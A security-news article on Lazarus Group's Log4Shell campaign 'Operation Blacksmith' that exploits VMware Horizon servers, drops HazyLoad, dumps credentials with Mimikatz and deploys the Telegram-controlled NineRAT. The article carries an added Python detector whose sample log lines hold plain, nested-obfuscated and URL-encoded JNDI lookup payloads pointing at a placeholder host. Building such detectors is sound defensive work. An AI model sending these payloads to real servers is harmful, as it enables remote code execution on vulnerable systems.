Lazarus Group Targets Log4Shell Flaw Via Telegram Bots

The Lazarus Group threat actor has been observed conducting a fresh wave of attacks, named “Operation Blacksmith,” that focuses on exploiting the Log4Shell vulnerability (CVE-2021-44228).

Lazarus Group Targets Log4Shell

A recent advisory from security researchers at Cisco Talos reveals that the attackers exploited the Log4Shell vulnerability in publicly exposed VMware Horizon servers to gain initial access.
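Because the initial access described here relies on a Log4j lookup string reaching a vulnerable server, a detection engineer's first check is usually the web-server access log. The following detector is an added example, not code from this article or from Cisco Talos; it assumes a simplified model of Log4j 2 lookup nesting (`lower`, `upper` and the `:-` default-value syntax) and runs over constructed sample log lines.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup (its body contains no nested braces).
_INNER = re.compile(r"\$\{([^{}]*)\}")
# A JNDI lookup pointing at one of the protocols Log4j 2 would resolve.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|http)\s*:", re.I)


def _resolve(body: str) -> str:
    """Evaluate one innermost lookup the way Log4j 2 would (simplified, assumed)."""
    if ":-" in body:                        # ${anything:-value} -> value
        return body.split(":-", 1)[1]
    prefix, sep, arg = body.partition(":")
    if sep and prefix.lower() == "lower":   # ${lower:X} -> x
        return arg.lower()
    if sep and prefix.lower() == "upper":   # ${upper:x} -> X
        return arg.upper()
    return "${" + body + "}"                # jndi and unknown lookups stay as they are


def normalize(text: str) -> str:
    """URL-decode and collapse nested lookups until the text stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = _INNER.sub(lambda m: _resolve(m.group(1)), unquote(text))
    return text


def detect_log4shell(line: str):
    """Return the normalized line if it carries a JNDI lookup, otherwise None."""
    norm = normalize(line)
    return norm if _JNDI.search(norm) else None


def scan(lines):
    """Return (index, normalized_line) for every log line that triggers detection."""
    hits = []
    for i, line in enumerate(lines):
        norm = detect_log4shell(line)
        if norm is not None:
            hits.append((i, norm))
    return hits


# Constructed sample access-log lines (not real traffic); example.invalid is a placeholder host.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2023:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2023:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid:1389/a}"',
    '10.0.0.9 - - [10/Dec/2023:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${::-l}dap://example.invalid/b}"',
    '10.0.0.9 - - [10/Dec/2023:10:01:11 +0000] "GET /portal/?q=%24%7Bjndi%3Armi%3A%2F%2Fexample.invalid%2Fc%7D HTTP/1.1" 404 0 "-" "curl/8.0"',
]

if __name__ == "__main__":
    for idx, norm in scan(SAMPLE_LOG):
        print(f"line {idx}: {norm}")
```

The normalization step matters because the raw-string match `${jndi:` misses the nested and URL-encoded forms in lines 2 and 3, which a vulnerable server would still resolve.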

The advisory states, “This campaign involves persistent opportunistic targeting of global enterprises that openly host and expose susceptible infrastructure to n-day vulnerability exploitation, such as CVE-2021-44228.”

The advisory further notes, “Lazarus has been observed focusing on companies within the manufacturing, agricultural, and physical security sectors.”

After successfully exploiting the system, Lazarus carried out thorough reconnaissance, executing various commands to collect system information, query event logs, and dump OS credentials.

The attackers used a custom implant called HazyLoad, which serves as a proxy tool to establish direct access to the compromised system.

Notably, Lazarus departed from its previous tactics by creating a local user account with administrative privileges, rather than using unauthorized domain-level accounts.

In a further change, the threat actors altered their tactics during the hands-on-keyboard phase by downloading and using credential dumping utilities, including ProcDump and Mimikatz.

During the second phase of the operation, the deployment of a previously unknown Remote Access Trojan (RAT) named “NineRAT” was uncovered. Of significance is the RAT’s use of a Telegram-based Command and Control (C2) channel to receive initial commands for fingerprinting infected systems.

Moreover, the research identified a shift in Lazarus’ tooling: NineRAT is written in DLang, a departure from the group’s conventional frameworks.

The company also highlighted, “NineRAT possesses the capability to uninstall itself from the system using a BAT file.”

According to Cisco Talos, the information gathered by Lazarus through NineRAT might be shared with other Advanced Persistent Threat (APT) groups, and it is stored in a repository separate from the initial-access and implant-deployment data.

IOCs (file hashes for HazyLoad, NineRAT, BottomLoader and DLRAT, plus network indicators)



About the Author: FirstHackersNews - Identifies Security
